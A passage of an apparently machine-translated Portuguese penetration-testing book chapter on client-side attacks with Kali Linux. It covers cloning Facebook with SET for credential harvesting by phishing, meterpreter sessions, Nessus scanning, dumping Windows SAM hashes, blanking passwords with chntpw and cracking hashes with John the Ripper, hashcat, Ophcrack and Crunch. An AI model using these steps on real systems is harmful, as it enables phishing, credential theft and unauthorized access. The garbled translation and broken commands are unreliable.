A mquina cliente ver uma mensagem de Java pop-up simples, que parece normal e
deve passar despercebida pelo usurio mdio, como mostrado na imagem seguinte:
No momento em que o usurio final executar o applet Java no site clonado, o Kali
servidor ir conectar a mquina da vtima, como mostrado na imagem seguinte:
O exemplo a seguir uma imagem mostrando que SET pode interagir com o meterpreter
sesso e emitir comandos diretamente para a vtima:
[138]
Captulo 4
Voc pode ter vrias sesses com o meterpreter. Neste exemplo, foi utilizado o
comando sesses de I 1. Essencialmente, o que estamos fazendo est interagindo com o primeiro
sesso do meterpreter. Se tivssemos vrios hosts comprometidos, poderamos ter
vrias sesses Meterpreter, interagir com eles, alternar entre eles, ou perto
los individualmente.
Agora que j aprendeu alguns dos princpios bsicos do uso de SET, vamos olhar para mais uma
exemplo. Vamos olhar para a clonagem de um website para fins de roubo
uma senha.
Desta vez, quando chegamos s opes de ataque, vamos selecionar ataque harvester credencial.
O ataque harvester credencial pode ser encontrado primeira seleo Engenharia Social
Ataques, Vetores de Ataque Website, e, em seguida, Ataques Harvester credencial.
[139]
Ataques do lado do cliente
Voc tem a opo de clonar um site, usando um modelo de site, ou importar
seus prprios arquivos da Web (HTML, imagens e outros arquivos).
Sites populares como Facebook, Gmail, Twitter e ter modelos. Entrando
o URL do site pode clonar outros sites. Encontramos em alguns casos, tanto o site
templates e clonagem de um site simplesmente no parece certo. Nesses casos, voc deve usar
uma importao personalizada. Voc pode usar copiadora web ou software de clonagem web, o
que temos
j discutido, para salvar uma cpia de um site em sua caixa de Kali. Uma vez salvo, o uso
a opo de importao personalizada para apontar para o diretrio site copiado. Voc vai precisar
de
experimentar para ver o que funciona melhor opo para o seu site particular.
Vamos escolher opo 2) Stio Cloner. Ns ser solicitado a digitar uma URL. Iremos
clone https://www.facebook.com.
Note-se que estamos entrando na URL exata e especificando se queremos que o
HTTPS ou URL HTTP. Na maioria dos casos, isso no far nenhuma diferena
porque no vamos hospedar um site seguro, mas em alguns casos o HTTP
site pode ser diferente do que o local de HTTPS.
Tambm ser solicitado a digitar o endereo IP que SET vai usar para hospedar o falso
site. Muito provavelmente este ser o endereo IP da sua caixa de Kali Linux. No entanto, se
voc est pensando em dirigir as vtimas para um endereo que est usando uma traduo NAT
(Talvez atravs de um firewall upstream), digite o endereo NAT.
SET comear esperando por conexes depois de ter clonado um site e
configurada a porta de escuta, como mostrado na imagem seguinte:
[140]
Captulo 4
O prximo passo direcionar os usurios para o site falso. Uma maneira comum de fazer isso
enviando um e-mail falso tambm conhecido como phishing e-mail. SET pode automatizar isso para
voc, mas para este exemplo, ns decidimos faz-lo manualmente. O prximo exemplo mostra um
falso e-mail usando o nosso link Facebook clonado. Quando o usurio clica no link www.
facebook.com, eles sero enviados para o nosso site falso em facebook.secmob.net.
[141]
Ataques do lado do cliente
Voc pode ver na imagem seguinte pgina clonada parece com o Facebook, mas
o URL no realmente Facebook. O ataque assume a vtima no vai notar a
ligeiramente diferente URL, que por isso que ataques de phishing reais usar domnios
semelhantes
o site real.
Quando a vtima entra em seu nome no site falso, SET ir redirecionar o usurio
para o site real. Na maioria dos casos, os usurios podero digitar sua senha uma segunda vez sobre
o real
local e ser registrado no site, sem nunca perceber que eles foram atacados. Na Kali
Sistema Linux em execuo SET, voc pode ver que a senha capturada.
[142]
Captulo 4
Alm do registo directo, SET ir gerar um relatrio do incidente, de modo que o
atacante pode aproveitar as credenciais roubadas em um momento posterior.
Ao utilizar ferramentas como o SET para atacar clientes, importante para um verificador da
penetrao
para entender o comportamento dos clientes. Uma das maneiras mais eficientes de fazer isso
usando um servidor proxy para examinar e pedidos de interceptao da web.
Em Captulo 6, ataques na Web, vamos olhar para Proxies com muito mais detalhes, no entanto,
ainda importante para aprender a analisar a forma como o cliente se comporta ao usar web
ataques como o uso de SET como pargrafo anterior descrito.
MitM Proxy
MITM Proxy uma grande ferramenta para um verificador da penetrao para examinar o cliente
vulnerabilidades. Ele permite que o administrador para examinar a conexo HTTPS, parada,
examinar e responder trfego. MITM Proxy permite que um administrador para alterar o pedido
ou resposta de um servidor web.
MITM Proxy pode permitir que um verificador da penetrao para examinar os ataques de forma
rpida e
ver o que solicitaes e respostas so provenientes de navegador web. MITM Proxy
pode ser lanado, indo para Barrilha |Sniffing / Spoofing |Sniffers Web e
selecionando mitmproxy.
[143]
Ataques do lado do cliente
recomendado usar MITM Proxy quando a criao de um ataque SET, como
bem como quando se analisa o comportamento de ataque. Voc deve executar SET
e Proxy MITM ao mesmo tempo em um ambiente de teste.
Uma vez procurao MitM carregado, voc ter que apontar o navegador do seu cliente para o
seu servidor de Kali. MITM exibir as transaes que ocorrem no solicitaes da Web
do lado do cliente, como mostrado na imagem seguinte:
Haver um registro de todas as atividades do navegador passando por cliente. Embora MITM
Proxy no utilizado como um componente activo num teste tpico de penetrao da web, que um
tima ferramenta para usar quando configurar e testar SET antes de usar o pacote em um ao vivo
ambiente. Nos prximos captulos, vamos examinar outros tipos de proxies, no entanto, o
razo gostamos MitM Proxy porque uma maneira fcil como verificador da penetrao voc pode
ferramentas de ataque de ensaio por t-los conectados diretamente em sua caixa de Kali Linux.
Hospedar
digitalizao
Um mtodo comum para acesso a sistemas de host de identificar e explorar
vulnerabilidades no sistema operacional, os aplicativos instalados, e outros programas.
Ferramentas como Nessus so mtodos para avaliar os sistemas de conhecido automatizado
vulnerabilidades. Esta seo ir cobrir a forma de instalar e executar o Nessus contra um alvo
sistema. Ferramentas Explorao abordados Captulo 3, os ataques do lado do servidor, pode ser
usado para
tirar vantagem das vulnerabilidades identificadas pelo Nessus.
[144]
Captulo 4
Hospedar digitalizao com Nessus
O Nessus no vm pr-instalados com Kali. Voc vai precisar de obter registro
cdigo de Defensvel usar Nessus. Defensvel d uma opo de alimentao de casa, mas limitada
para a digitalizao de 16 endereos IP. Se voc gostaria de digitalizar mais IPs, voc deve comprar
um
rao profissional de sustentvel.
Nessus HomeFeed est disponvel apenas para uso pessoal e no comercial. Se voc vai
usar o Nessus no seu local de trabalho, voc deve comprar Nessus ProfessionalFeed.
Para obter um cdigo de ativao para ir para o Nessus http://www.tenable.com/products/
nessus / nessus-HomeFeed.
O Nessus no vem pr-carregado com Kali e ter de ser instalado. Voc ir
precisa baixar e instalar o Nessus. No h uma verso especfica para Kali Linux,
mas a verso Debian 6.0 funciona bem.
1. Baixe Nessus para o Debian. Ir para o site http://www.tenable.com/
products / nessus / select-seu-sistema operacional baixar Nessus
para o Debian 64 bits.
Note-se que quando voc baixar o Nessus, voc pode copi-lo para o / Tmp
diretrio. Se voc introduzir estes comandos a partir de outro diretrio, voc
ser necessrio ajustar os comandos.
Instalando o Nessus em Kali
2. V para o diretrio onde voc baixou o Nessus e emitir o
os seguintes comandos:
ar vx Nessus-5.2.1-debian6 *
tar-xzvf data.tar.gz
tar-xzvf control.tar.gz
ar vx Nessus-5.2.1-debian6 *,
tar-xzvf data.tar.gz
tar-xzvf control.tar.gz
Haver agora uma etc diretrio e uma optar diretrio.
[145]
Ataques do lado do cliente
3. Copie o nessus diretrio / Tmp / opt / ao / Opt diretrio, fazer o /
optar diretrio se ele no existir. Emita os seguintes comandos:
mkdir / opt (Voc pode obter um erro informando o diretrio / opt existe
no entanto, passar para o prximo comando).
cp-rf / <installed folder> / opt / nessus / opt
cp-rf / <installed folder> / etc / init.d / nessus * / etc / init.d
4. Voc pode excluir o contedo de download do Nessus / Tmp diretrio.
5. Para iniciar o Nessus, emita o seguinte comando:
/ Etc / init.d / start nessusd
6. Log para a interface de gerenciamento Nessus. Abra um navegador e navegue
para https://127.0.0.1:8834.
Usando o Nessus
A primeira vez que voc entrar no Nessus, voc ser saudado com algumas mensagens de boas
vindas,
e um aviso SSL ir aparecer permitindo que voc saiba que voc est se conectando a uma auto-
assinado
certificado. Depois de algumas telas iniciais de auto-explicativo, voc ser solicitado a digitar
o cdigo de ativao e baixar as ltimas plugins.
[146]
Captulo 4
Voc tambm vai definir um nome de usurio e senha que ser usada para gerenciar o Nessus
aplicao. As imagens abaixo mostram a criao de uma conta e fornecer a
cdigo de ativao por e-mail por Tenable depois de registrar:
[147]
Ataques do lado do cliente
Download inicial dos plugins pode levar algum tempo, portanto seja paciente.
Uma vez que todas as atualizaes foram baixadas e inicializado, voc ser apresentado
com tela de login. Use o nome de usurio e senha que voc definiu durante a
instalao inicial.
Para iniciar a digitalizao, clique no Digitalizao guia na faixa de opes superior e selecione New
Scan. Voc ir
ento ser solicitado a digitar os detalhes do alvo. Voc tambm ser solicitado a selecionar o que
modelo que voc gostaria de usar. Nessus tem alguns modelos integrados. Neste exemplo,
estamos escolhendo digitalizao em rede externa.
[148]
Captulo 4
Se o Digitalizao guia no estiver disponvel, voc tambm pode selecionar
Modelos de Digitalizao
e Nova digitalizao para criar uma nova verificao.
Depois de selecionar Criar Digitalizao, a digitalizao vai lanar no horrio agendado. O padro
cronograma ser executado de imediato, por isso, na maioria dos casos, o exame vai comear a
funcionar imediatamente.
Aps a verificao for concluda, os resultados podem ser vistos clicando no Resultados guia.
Isto ir fornecer ao administrador um relatrio do que o Nessus encontrado.
[149]
Ataques do lado do cliente
Podemos examinar os exames concludos, bem como quaisquer resultados obtidos at o
momento, em qualquer
varreduras ativas, como mostra a imagem a seguir:
Como um verificador da penetrao, voc quer prestar ateno a quaisquer vulnerabilidades.
Vulnerabilidades identificadas pelo seu patch ou vulnerabilidade referncia Microsoft
nmero pode ser pesquisada no mbito Metasploit usar um exploit em um
alvo host. Consulte Captulo 3, os ataques do lado do servidor, sobre como utilizar o Metasploit
para
mais informaes.
O exemplo anterior mostra algumas vulnerabilidades extremamente perigosas (no
se preocupe, ns voltamos e corrigido dos sistemas). Todas estas vulnerabilidades pode ser
usada para explorar um sistema usando Metasploit ou outras ferramentas de ataque. Para mais
informaes sobre a explorao
vulnerabilidades encontradas pelo Nessus, consulte Metasploit em Captulo 3, os ataques do lado do
servidor.
[150]
Captulo 4
Nessus oferece opes para exportar detalhes sobre as vulnerabilidades identificadas. Voc pode
resultados de exportao como HTML, CSV, PDF, e muitos outros tipos de arquivos comuns. Para
exportar
resultados, v para o Resultados seo e selecionar uma varredura completa. A terceira aba na
esquerda oferece opes para exportar scans, como mostrado nas duas imagens seguintes:
Nessus Exportao de
digitalizao
Obteno e rachaduras senhas de usurios
Quebra de senha por definio, a recuperao de senhas a partir de dados que tem sido
armazenados ou transmitidos por um sistema de computador. As senhas so usadas para proteger
vrios
tipos de sistema, o que temos abordadas no Captulo 3, os ataques do lado do servidor, enquanto
atacar servidores web.
Os sistemas host so geralmente baseados em Linux e Windows ou ter caractersticas especficas
a respeito de como eles armazenar e proteger senhas de usurios. Esta seo se concentrar
em rachar arquivos de senha do sistema host. Ns inclumos isso no Aplicao Web
Teste de Invaso livro, porque os sistemas de acolhimento um cliente autorizado comum
aplicaes web. Comprometer um cliente significa abrir uma porta de acesso a um alvo
aplicao web.
O mtodo mais fcil de obter senhas de usurios por meio de engenharia social. Como
descrito anteriormente, um hacker poderia obter senhas ou pistas de como senhas
so criados, colocando como um sujeito autorizado. Por exemplo, a identificao de que todos
senhas devem ter entre 6-10 caracteres, comear com uma letra maiscula e termina com
um nmero reduz drasticamente o nmero de resultados possveis de um hacker
precisa para tentar quebrar uma senha. (Kali oferece uma ferramenta chamada Crunch que faz
gerando uma lista de senhas para este tipo de ataque extremamente fcil).
[151]
Ataques do lado do cliente
Um verificador da penetrao experiente deve usar tcnicas de reconhecimento apresentados em
Captulo
2, reconhecimento, para identificar os tipos de sistema, possveis polticas de senha, as pessoas
envolvidas
com os sistemas de administrao e outras informaes que ajudam a diminuir a
possibilidades necessrias para quebrar uma senha.
Existem algumas formas hackers quebrar senhas. Estes so listados como se segue:




Adivinha: Acho manualmente usando informaes obtidas sobre um alvo
Ataque de dicionrio: Use um ataque automatizado que tenta todos os possveis
palavras do dicionrio
Brute-force: Tente todas as combinaes possveis de caracteres
Hbrido: Combinando dicionrio com fora bruta
As senhas devem ser armazenados de modo que os sistemas possam verificar a identidade de um
usurio e acesso
direitos. Sistemas no armazenar senhas em arquivos de texto simples, por razes bvias de
segurana.
A maioria dos sistemas no usam criptografia como o nico meio para proteger senhas, porque um
chave necessria para desencriptar, o que representa uma fraqueza de proteger os arquivos
criptografados.
Hashing Foi inventado como um meio para transformar uma chave ou senha, geralmente aritmtica,
para um valor completamente diferente. Hash irreversvel e produz o mesmo
valor para uma chave inserida, o que significa um hash podem ser armazenados e verificados contra
um
introduzido uma senha para verificar a autenticidade. Mudando um fator, como fazer uma carta
de capital ou adicionar um espao, gera uma sada de hash completamente diferente.
Os hashes podem ser brute-forados como uma senha se voc sabe a frmula para a gerao de
um Hash. Muitas ferramentas de quebra de senhas, como John the Ripper capaz de
detectar um hash e de fora bruta ataca todas as combinaes de sada de hash com
sadas de hash gerado automaticamente. Uma vez que uma correspondncia for encontrada, John
the Ripper ir imprimir
a senha de texto simples usado para gerar o hash correspondente.
Tabelas do arco-ris o pior adversrio para algoritmos de hash comuns. Arco-ris
tabelas so uma base de dados pr-calculado de todas as sadas de hash que podem ser
pesquisados
para identificar uma sada de hash. Sites como www.freerainbowtables.com oferta
verses para os algoritmos de hash populares, tais como MD5 encontrados na maioria dos sistemas
Windows.
Kali tambm oferece aplicaes como RainbowCrack usado para gerar as tabelas do arco-ris.
Salga um hash foi criado como uma forma de combater as tabelas do arco-ris, adicionando
pedaos personalizados adicionais para mudar a sada de um hash para algo no encontrado
em tabelas comuns do arco-ris. Infelizmente, muitos sistemas, como o Windows fazer
no usar hash salgado.
[152]
Captulo 4
As senhas do Windows
Windows o sistema operacional mais utilizado por empresas no mundo todo.
Microsoft tem tido uma estrada rochosa sobre senhas que protegem. O actual
Os produtos da Microsoft so muito mais seguras do que as verses mais antigas, no entanto,
eles so
ainda vulnervel a ataques de muitas ferramentas oferecidas em Kali.
Windows armazena senhas na SAM (Sistema Gesto de Contas) registro
arquivo. A exceo a isso quando Active Directory usado. Um Active Directory
um sistema de autenticao separado que armazena senhas em um banco de dados LDAP. O SAM
arquivo est localizado em C: \ <systemroot> \ sys32 \ config.
O SAM arquivo armazena as senhas em um formato de hash usando o LM e NTLM de hash
para aumentar a segurana para o arquivo protegido. O SAM arquivo no pode ser movido ou
copiado enquanto
Windows est em execuo. O SAM arquivo pode ser despejado, exibindo os hashes de senha
que pode ser movido fora do ar por uma ferramenta de fora bruta de crack. Um hacker tambm
pode obter o
SAM arquivo inicializando um sistema operacional diferente, montagem C: \, Iniciar uma distribuio
Linux em
um disco (como Kali), ou arrancar a partir de uma unidade de CD / disquete.
Um lugar comum para encontrar uma SAM arquivo est no C: \ <systemroot> \ repair pasta.
A cpia de segurana SAM arquivo criado por padro e, normalmente, no excludos pelo sistema
administradores. O arquivo de backup est desprotegido, mas comprimido, o que significa que
voc
deve descompactar o arquivo para obter os arquivos de hash. Voc pode usar o utilitrio de
expandir-se para
fazer isso. O comando Expandir [FILE] [DESTINO]. Aqui est um exemplo de
expanso do SAM arquivo para o descomprimida SAM arquivo.
C: \> expandir SAM uncompressedSAM
Para aumentar a segurana de hackers desligada, Microsoft Windows 2000 e
verses mais recentes incluem um SYSKEY utilidade. O SYSKEY utilitrio criptografa o hash
senhas no SAM arquivo usando a chave de criptografia de 128 bits, que um diferente
chave para cada instalao.
Um invasor com acesso fsico a um sistema Windows podem obter o SYSKEY
(Tambm chamada a tecla de arranque), usando os passos seguintes:
1. Iniciando um outro sistema operacional (como Kali).
2. Roubando a SAM e SISTEMA urticria (C: \ <systemroot> \ sys32 \ config).
3. Recuperando-se a chave de inicializao do SISTEMA colmeia usando bkreg ou bkhive.
4. Despejar os hashes de senha.
5. Quebr-las off-line com uma ferramenta como o John the Ripper.
[153]
Ataques do lado do cliente
Note que se voc acessar um arquivo no Windows, voc modificar o MAC (modificar,
acesso e mudana), que a forma como o Windows registra sua presena. Para evitar
deixando evidncias forenses, recomenda-se a copiar o host de destino
sistema antes de lanar ataques.
Montagem do Windows
Existem ferramentas disponveis para a captura do Windows SAM e SYSKEY arquivos. Um
mtodo para capturar esses arquivos a montagem do sistema de destino do Windows para que
o
outras ferramentas podem acessar esses arquivos, enquanto a Microsoft Windows no est em
execuo.
O primeiro passo consiste em usar o fdisk-l comando para identificar suas parties. Voc deve
identificar o Windows e tipos de partio. O fdisk resultado mostra uma partio NTFS,
como se segue:
Blocos Dispositivo Boot Incio Fim Sistema Id
/ Dev/hdb1 * 1 2432 19535008 + 86 NTFS
/ Dev/hdb2 2433 2554 979965 82 Linux swap / Solaris
/ Dev/hdb3 2555 6202 29302560 83 Linux
Crie um ponto de montagem utilizando o comando mkdir / mnt / windows.
Monte o sistema do Windows usando o comando como mostrado no exemplo a seguir:
mount-t <WindowsType> <Windows partition> / mnt / windows
Agora que o seu alvo do sistema Windows montado, voc pode copiar o SAM e
SISTEMA arquivos em seu diretrio ataque usando o seguinte comando:
cp SAM SYSTEM / pentest / passwords / AttackDirectory
Existem ferramentas disponveis para despejar o SAM arquivo. PwDump e Caim e Abel
so apenas alguns exemplos. Kali ofertas samdump mostrado, na seo de ferramentas de senha
deste captulo.
Note que voc vai precisar para recuperar tanto o Bootkey e SAM arquivos.
O Bootkey arquivo usado para acessar o SAM arquivo. Ferramentas utilizadas para
acessar o
SAM arquivo exigir a Bootkey arquivo.
[154]
Captulo 4
bkreg e bkhive so ferramentas populares que podem obter a Bootkey apresentar, como mostrado na
tela a seguir:
Sistemas host Linux no so to comuns como o Windows e representam um desafio diferente
para a obteno de acesso root. Muitos sistemas podem ter as senhas armazenadas em claro
quando auto-login est habilitado, como o . Netrc arquivos usados para Telnet e FTP. Para
a maioria dos ataques, voc vai querer capturar o passwd e sombra arquivos armazenados comumente
em / Etc / passwd e / Etc / shadow.
O sombra arquivo pode ser lido apenas pelo root e, normalmente um hash MD5. O sombra
arquivo mais difcil de entender do que uma janela de SAM arquivo. Existem mtodos de captura
o sombra arquivo usando carregadores de inicializao como larva.
Quebrando uma senha Linux similar a outros sistemas, como o Windows. A maioria
hbridas automatizado programas de cracking, como John the Ripper pode identificar o tipo
de haxixe e ataque de fora bruta a sombra senhas com o dicionrio direita.
Senhas Linux
Kali quebra de senha ferramentas
Kali oferece diversos utilitrios para burlar a segurana da senha. Ferramentas de quebra de senha
pode
ser encontrado em Ataques senha e divide-se em ferramentas utilizadas para off-line e on-line
ataques. Esta seo ir focar em ferramentas utilizadas para sistemas host de compromisso durante
uma
aplicao Web Penetration Test. H outras ferramentas disponveis no Kali, como ferramentas
projetado para quebrar senhas de protocolos sem fio, no entanto, que est fora do escopo
neste texto.
[155]
Ataques do lado do cliente
Note-se que John a linha de comando Ripper e Hydra estavam cobertos de
Captulo 3, os ataques do lado do servidor.
Johnny
Johnny uma interface grfica para o John muito popular a ferramenta quebra de senha Ripper. Ns
cobriu a verso de linha de comando tradicional de John the Ripper Captulo 3, Servidor-
Ataques laterais. Tal como a verso de linha de comando, Johnny tem vrios mecanismos que
permitem
ele para quebrar diferentes tipos de senhas, incluindo senhas criptografadas e hash.
Johnny tem a capacidade de detectar automaticamente a maioria dos hashes e senhas
criptografadas, tornando
o processo mais fcil para os testadores de penetrao. Atacantes como a ferramenta, pois muito
customizvel e pode ser configurado em uma variedade de maneiras diferentes de acelerao
quebra de senha.
Algumas personalizaes podem no estar disponveis em Johnny. Recomenda-se o
verso de linha de comando, John the Ripper, para a maioria dos ataques.
John the Ripper funciona da seguinte maneira:






As tentativas de cracking de senhas com palavras de dicionrio
Usa dicionrio palavras com caracteres alfanumricos e anexado
preconfinado
Coloca dicionrio palavras juntas
Adiciona caracteres alfanumricos para combinar palavras
Executa palavras de dicionrio com caracteres especiais misturados
Quando tudo mais falhar, as tentativas de fora
bruta.
Para usar Johnny, v para Ataques senha |Ataques offline e selecione Johnny.
Clique em Abrir Arquivo de senhas e selecione o arquivo de senha que deseja crack.
A figura a seguir mostra um sombra arquivo com os usurios BOB, mary, e joey
como os alvos.
[156]
Captulo 4
O Senha guia ser preenchida como Johnny rachaduras as senhas.
Johnny tem guias de configurao no lado esquerdo. O Opes guia onde voc seleciona
o tipo de ataque. A figura a seguir mostra uma definio do padro
comportamento e as opes para selecionar o tipo de hash. Deteco automtica de Johnny
normalmente 90 por cento correto.
[157]
Ataques do lado do cliente
O Estatstica guia exibe quanto tempo Johnny tem funcionado uma sesso ativa.
O Configuraes guia especifica como Johnny ser executado, como mostrado no exemplo a
seguir:
Note-se que as configuraes padro para o caminho para John the Ripper pode no ser
correta. Certifique-se de verificar o caminho para John the Ripper sob Configuraes.
Em verses mais antigas do BackTrack, descobrimos que voc tem que atualizar o
caminho
manualmente / Pentest / passwords / john / john. Kali 1.0 padro /
user / sbin / john.
O Sada guia mostra o que Johnny est atacando. Voc tambm vai encontrar erro
mensagens e atualizaes sobre o status de uma sesso de ataque. O exemplo a seguir
mostra uma mensagem que apresenta Johnny identificar o tipo de hash:
John the Ripper e listas de palavras-padro da sua interface grfica muito limitada. Ns
recomendamos o uso de uma lista maior, que pode ser encontrada atravs de pesquisa on-line.
Para usar um
wordlist costume, v para o Opes guia e selecione Modo Wordlist. Navegue at o seu
lista de palavras personalizada e clique em Aplicar.
[158]
Captulo 4
Johnny vai preencher as clulas de senha ao lado de nomes como senhas esto rachados. O
imagem seguinte mostra dois dos trs senhas rachado:
hashcat e oclHashcat
hashcat e oclHashcat so utilitrios cracker de senha. oclHashcat um GPGPU-
verso baseada. Os utilitrios hashcat / oclHashcat so ferramentas que podem lidar com multithread
mltiplas hashes e listas de senhas durante uma sesso de ataque nico. O hashcat /
utilitrios oclHashcat oferecem muitas opes de ataque, como a fora bruta, combinador,
dicionrio, hbrido, mscara, e os ataques baseados em regras.
[159]
Ataques do lado do cliente
BackTrack oferece muitas verses de hashcat encontrado em Privilege Escalation
|Ataques senha |Ataques offline. O cl "ocl", ou aberto, aberto
implementao de unificar os drivers da Nvidia e ATI GPU. Algumas verses podem
no funcionar mesmo depois de atualizar BackTrack. Pode ser necessrio fazer o download da
atualiza
verses de www.hashcat.net.
Para usar hashcat, abra o aplicativo hashcat ou navegue at Ataques senha
|Ataques offline |hashcat.
Para usar hashcat em um documento, tipo hashcat [opes] hashfile
[WORDFiles | diretrios. O exemplo a seguir mostra hashcat a execuo de um
lista de palavras contra um sombra arquivo:
hashcat oferece uma interface grfica, bem como, que funciona como um frontend para o CLI.
Algumas pessoas gostam
isso, porque simples de usar e inclui a exibio o cdigo de linha de comando no
janela inferior.
[160]
Captulo 4
samdump2 um utilitrio que despeja os hashes de senha do Microsoft Windows a partir de
umaSAM ficheiro de modo a que eles possam ser quebrada por uma ferramenta desligada. Para
as verses mais recentes do
Windows, voc vai precisar de uma ferramenta para capturar o SYSKEY Arquivo (chave de
inicializao) para
acessar os hashes armazenados no SAM base de dados.
samdump2 pode ser encontrado em Ataques senha |Ataques offline |samdump2.
Quando voc abre samdump, Um Terminal janela pop-up.
samdump2
Voc deve montar o seu alvo de sistema do Windows, de modo que samdump pode acessar o SAM
arquivo.
Em seguida, copie o SAM e SISTEMA arquivos em seu diretrio ataque.
cp do sistema SAM / root / AttackDirectory
Navegue at o diretrio ataque e emisso bkhive bootkey SISTEMA para se obter o
bootkey. Copie o bootkey em um arquivo de texto para que samdump tem o SAM arquivo com
bootkey.
cd / root / AttackDirectory> windowshashfiles.txt
Executar samdump usando o samdump SAM bootkey comando. Copie a sada
em um segundo arquivo de texto.
Samdump2 SAM bootkey> windowshashfiles2.txt
Agora, use uma ferramenta de quebra de senha, como John the Ripper para quebrar os
hashes!
chntpw
chntpw uma ferramenta on Kali Linux, Backtrack, e outras distribuies Linux que redefine
senhas locais no Windows 8 e verses anteriores do Windows. Ele modifica o
Banco de dados de senha do Windows. Esta ferramenta utilizada principalmente para a obteno
no Windows
caixas quando voc no sabe a senha.
[161]
Ataques do lado do cliente
Para usar chntpw, Arrancar a mquina Windows com o Live CD do Kali. Para baixar
Kali Linux, v para o http://www.kali.org/downloads/ e baixar a imagem ISO.
Queime o ISO em um CD e iniciar a mquina Windows com o CD ao vivo. Na inicializao
menu para Kali, selecione Forensics opo.
O SAM arquivo geralmente est localizado sob / Windows/System32/config. Voc vai precisar de
para navegar no Terminal tela para este diretrio. Em seu sistema, pode parecer
algo como isto:
/ Media/hda1/Windows/System32/config
Cada sistema pode ser ligeiramente diferente. Neste exemplo, Kali parece estar a usar o
nmero de srie do meu disco rgido como a localizao do dispositivo. Isso porque eu tenha
inicializado
de uma mquina virtual Windows 7 com o Live CD do Kali. O SAM base de dados geralmente
no / Media / name_of_hard_drive / Windows/System32/config.
[162]
Captulo 4
A captura de tela a seguir lista o SAM arquivo de banco de dados no meu disco
rgido:
O comando chntpw-l SAM ir listar todos os nomes de usurios que esto contidos em
o sistema Windows. A figura a seguir mostra o resultado da execuo do
comando chntpw-l SAM:
O comando d-nos uma lista de nomes de usurios no sistema. Quando temos a
username queremos modificar, corremos o comando chntpw-u "username" SAM.
Neste exemplo, temos digitado chntpw-u "Administrador" SAM, e temos a
seguinte menu:
Agora temos a opo de limpar a senha, alterar a senha, ou
promovendo o usurio administrador. Alterando a senha nem sempre funciona
em sistemas Windows 7, por isso recomendamos limpar a senha. Ao fazer isso, voc
ser capaz de entrar no sistema alvo com uma senha em branco.
[163]
Ataques do lado do cliente
Para acessar chntpw, V para o Ataques senha |Ataques offline |chntpw. ATerminal
janela se abrir, mostrando a tela de boas-vindas para chntpw. Existem alguns
maneiras de usar chntpw, como descrito na pgina de destino principal da seguinte forma:
Para usar o modo interativo, tipo chntpw-i eo caminho para o SAM arquivo. Se o destino
um sistema montado, voc ter de especificar a localizao da SAM arquivo dentro do
diretrio montado.
Um menu ir aparecer oferecendo opes para alterar o SAM arquivo. Voc pode selecionar
opo 1em branco a palavra-passe.
[164]
Captulo 4
Ophcrack
Ophcrack um cracker de senha do Windows com base em tabelas do arco-ris. Kali oferece uma CLI
e verso GUI. Ophcrack pode importar hashes de uma variedade de formatos, incluindo
despejo diretamente do SAM arquivos do Windows. O seguinte mostra imagem de tela
alguns dos formatos disponveis para carregar em Ophcrack:
Ophcrack vem com built-in tabelas do arco-ris, como mostrado no exemplo a seguir. Ns
recomendvel carregar as tabelas mais recentes do arco-ris ao invs de usar as tabelas padro.
[165]
Ataques do lado do cliente
Tabelas do arco-ris esto disponveis a partir de fontes online, como o site do desenvolvedor
http://ophcrack.sourceforge.net/tables.php.
Para acessar ophcrack, ir a Ataques senha |Ataques offline e selecione o
CLI ou verso GUI. Clique em Carga, e selecione o caminho para o arquivo que voc deseja
quebrar
(Por exemplo, um Windows SAM arquivo).
[166]
Captulo 4
Para este exemplo, foi utilizado o Kali ISO em uma mquina Windows e inicializado em Kali
Forensics modo. Ns ler a / Windows/system32/config diretrio para chegar ao
o SAM base de dados. Voc pode aprender mais sobre como usar Kali Linux no Forensics modo
em Captulo 7, contramedidas defensivas, deste livro. Voc tambm pode usar uma cpia offline
do SAM banco de dados diretamente com Kali.
[167]
Ataques do lado do cliente
Voc dever ver o hash com o nome de usurio e ID de usurio. Clique no Fenda boto
e esperar para a senha.
Crunch
Crunch uma ferramenta usada para gerar listas de senhas. Isto pode ser extremamente til se voc
so capazes de reunir informaes sobre a forma como o seu alvo cria senhas. Por exemplo, se
voc capturar duas senhas e observe o alvo usa uma fase seguido por acaso
dgitos, triturao pode ser utilizada para gerar rapidamente uma lista de que frase seguido por todo o
possveis dgitos aleatrios.
[168]
Captulo 4
Crunch tem caracteres especiais que se traduzem para o seguinte:




@: Insere caracteres minsculos
%: Os nmeros de inseres
,: Caracteres maisculos Inseres
^: Smbolos Inseres
Para este exemplo, vamos supor que conhecemos nossos usos alvo passar seguido por dois
caracteres desconhecidos em sua senha. Para executar Crunch para uma senha de seis caracteres
tendo passagem seguido de dois nmeros desconhecidos, uso %% para representar qualquer
nmero.
Para executar este e colocar a sada em um arquivo de texto chamado newpasswordlist.txt, Utilizar o
exemplo de entrada:
O arquivo de texto de sada conter todas as possveis combinaes de nmeros. A sequncia
imagem mostra a parte superior do arquivo de sada:
[169]
Ataques do lado do cliente
Para adicionar todas as letras minsculas, use triturar 6 6-t passagem seguido pela @ @ representando
todas as letras minsculas, como mostrado no exemplo a seguir:
Agora o arquivo de texto tem todas as letras minsculas e nmeros, como mostrado
na
seguinte exemplo:
Outras ferramentas disponveis no
Kali
Existem outras ferramentas teis encontrados em Kali. Ns limitamos a lista de utilitrios que
auxiliar comprometer sistemas host que acessam servidores de aplicativos web. Tem
outras ferramentas de quebra de senhas disponveis em Kali no mostradas nesta lista, no entanto, o
foco dessas ferramentas est fora do escopo deste texto.
Hash-identificador um utilitrio Python usado para identificar os tipos de hash. Mais password
ferramentas de cracking, como John the Ripper incluir uma funo de deteco automtica para
hashes
que so muito bons e provavelmente 90 por cento preciso. Esta utilidade pode ser utilizado para
verificar um tipo de hash manualmente. Para usar Hash-identificador, execute o utilitrio e col-lo
em
uma cpia do hash.
[170]
Hash-identificador
Captulo 4
A figura a seguir mostra uma sada de um hash:
dictstat
dictstat um utilitrio de script Python utilizado para anlise dos resultados de cracking de senha
ou para
uma anlise wordlist regular. dictstat ir analisar os resultados e fornecer mscaras para
-bruta forando combinaes de senha que j foram quebrados. Esta vontade
provvel fornecer pistas para rachar mais hashes em grupo. Isto pode ser til
quando o direcionamento de uma empresa com uma poltica de senha. A figura a seguir
mostra o dictstat tela inicial:
[171]
Ataques do lado do cliente
Para executar dictstat, Tipo dictstat [opes] passwords.txt. A sequncia
imagem mostra um exemplo do uso dictstat:
RainbowCrack o programa de quebra de hash que gera tabelas do arco-ris para ser
usado em quebra de senha. RainbowCrack diferente do que a fora bruta padro
abordagem usando grandes tabelas pr-computadas para reduzir o perodo de tempo necessrio
para
